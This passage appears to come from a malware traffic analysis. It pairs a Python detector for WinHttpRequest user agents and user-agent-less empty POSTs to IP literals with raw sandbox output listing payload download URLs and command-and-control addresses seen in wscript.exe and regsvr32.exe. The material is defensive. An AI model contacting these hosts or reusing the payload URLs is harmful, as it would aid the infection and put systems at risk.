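2023-03-20T09:06:38Z 192.168.2.3 GET https penshorn.org 443 /admin/Ses8712iGR8du/ ua="Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" clen=0
2023-03-20T09:06:39Z 192.168.2.3 GET https bbvoyage.com 443 /useragreement/ElKHvb4QIQqSrh6Hqm/ ua="Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" clen=0
2023-03-20T09:06:40Z 192.168.2.3 GET https www.gomespontes.com.br 443 /logs/pd/ ua="Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" clen=0
2023-03-20T09:08:10Z 192.168.2.3 POST https 164.90.222.65 443 /wfqhlvcfruxkwghn/ivirkxueekmcz/ ua="" clen=0
2023-03-20T09:08:15Z 192.168.2.3 POST http 104.168.155.143 8080 /wfqhlvcfruxkwghn/ivirkxueekmcz/ ua="" clen=0
2023-03-20T09:09:00Z 192.168.2.3 GET https www.example.com 443 /index.html ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/110.0" clen=0
2023-03-20T09:09:05Z 192.168.2.3 POST https api.example.com 443 /v1/submit ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/110.0" clen=512
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<scheme>https?) '
    r'(?P<host>\S+) (?P<port>\d+) (?P<path>\S+) ua="(?P<ua>[^"]*)" clen=(?P<clen>\d+)$')
# Default User-Agent of the WinHttp.WinHttpRequest COM object (what the .wsf used).
WINHTTP_UA_RE = re.compile(r"WinHttp\.WinHttpRequest\.\d")
WEB_PORTS = {80, 443}


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyse(log_text: str) -> list:
    """Return (line_no, rule) pairs for every heuristic a line trips."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            findings.append((n, "unparsed"))
            continue
        f = m.groupdict()
        port, clen, ip_host = int(f["port"]), int(f["clen"]), is_ip_literal(f["host"])
        if WINHTTP_UA_RE.search(f["ua"]):
            findings.append((n, "winhttprequest_default_ua"))
        if not f["ua"] and ip_host:
            findings.append((n, "ua_less_request_to_ip_literal"))
        if f["method"] == "POST" and clen == 0:
            findings.append((n, "empty_body_post"))
        if ip_host and port not in WEB_PORTS:
            findings.append((n, "ip_literal_nonstandard_port"))
    return findings


def summarize(findings: list) -> dict:
    """Count hits per rule."""
    return dict(Counter(rule for _n, rule in findings))


if __name__ == "__main__":
    for n, rule in analyse(SAMPLE_LOG):
        print(f"line {n}: {rule}")
    print(summarize(analyse(SAMPLE_LOG)))
```

The WinHttpRequest user agent on its own is noisy, since legitimate administrative scripts produce it too; what matches this sample is the combination of that user agent from a script host, a DLL download, and user-agent-less empty POSTs to IP literals on ports such as 7080 and 8080, so these hits are best joined with the process telemetry before alerting.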
        Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknown | TCP traffic detected without corresponding DNS query: 66.228.32.31
        Source: unknown | TCP traffic detected without corresponding DNS query: 66.228.32.31
        Source: unknown | TCP traffic detected without corresponding DNS query: 66.228.32.31
        Source: unknown | TCP traffic detected without corresponding DNS query: 66.228.32.31
        Source: unknown | TCP traffic detected without corresponding DNS query: 182.162.143.56
        Source: unknown | TCP traffic detected without corresponding DNS query: 182.162.143.56
        Source: unknown | TCP traffic detected without corresponding DNS query: 182.162.143.56
        Source: unknown | TCP traffic detected without corresponding DNS query: 182.162.143.56
        Source: unknown | TCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknown | TCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknown | TCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknown | TCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknown | TCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknown | TCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknown | TCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknown | TCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknown | TCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknown | TCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknown | TCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknown | TCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknown | TCP traffic detected without corresponding DNS query: 52.109.13.63
        Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknown | TCP traffic detected without corresponding DNS query: 52.109.76.141
        Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknown | TCP traffic detected without corresponding DNS query: 52.109.76.141
        Source: unknown | TCP traffic detected without corresponding DNS query: 52.109.13.63
        Source: unknown | TCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknown | TCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknown | TCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknown | TCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknown | TCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknown | TCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknown | TCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknown | TCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknown | TCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertif
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D846725000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: regsvr32.exe, 00000004.00000003.1860943829.0000000000D79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/
        Source: regsvr32.exe, 00000004.00000003.1860943829.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1863481873.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com//
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D8466F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/xM
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
        Source: wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/_
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
        Source: wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.co
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
        Source: wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0
        Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dll
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/4
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/P
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/Y
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/)
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/M
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz//
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bK
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/z
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/)
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/l
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnX
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLL
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/
        Source: regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/X
        Source: regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgz
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
        Source: wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
        Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll(
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
